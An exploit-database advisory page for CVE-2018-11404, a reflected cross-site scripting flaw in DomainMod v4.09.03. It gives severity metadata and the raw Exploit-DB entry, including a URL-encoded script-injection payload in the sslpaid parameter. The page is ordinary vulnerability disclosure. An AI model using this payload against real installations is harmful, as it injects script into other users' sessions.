header-logo
Suggest Exploit
vendor:
DomainMod
by:
longer
6.1
CVSS
MEDIUM
Cross-Site Scripting (XSS)
79
CWE
Product Name: DomainMod
Affected Version From: v4.09.03
Affected Version To: v4.09.03
Patch Exists: YES
Related CWE: CVE-2018-11404
CPE: a:domainmod:domainmod
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
2018

DomainMod v4.09.03 has XSS via the assets/edit/ssl-provider-account.php sslpaid parameter

An issue was discovered in DomainMod v4.09.03. After the user logged in, open the url: http://127.0.0.1/assets/edit/ssl-provider-account.php?del=1&sslpaid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28931289%29%3C/ScRiPt%3E The XSS payload will be executed.

Mitigation:

Input validation and output encoding should be used to prevent XSS attacks.
Source

Exploit-DB raw data:

# Exploit Title: DomainMod v4.09.03 has XSS via the assets/edit/ssl-provider-account.php sslpaid parameter
# Date: 2018-05-28
# Exploit Author: longer(76439392@qq.com)
# Vendor Homepage: domainmod (https://github.com/domainmod/domainmod)
# Software Link: domainmod (https://github.com/domainmod/domainmod)
# Version: v4.09.03
# CVE : CVE-2018-11404
 
An issue was discovered in DomainMod v4.09.03.(https://github.com/domainmod/domainmod/issues/63)
After the user logged in, open the url:
http://127.0.0.1/assets/edit/ssl-provider-account.php?del=1&sslpaid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28931289%29%3C/ScRiPt%3E

Navigation

Suggest Exploit

Services By CQR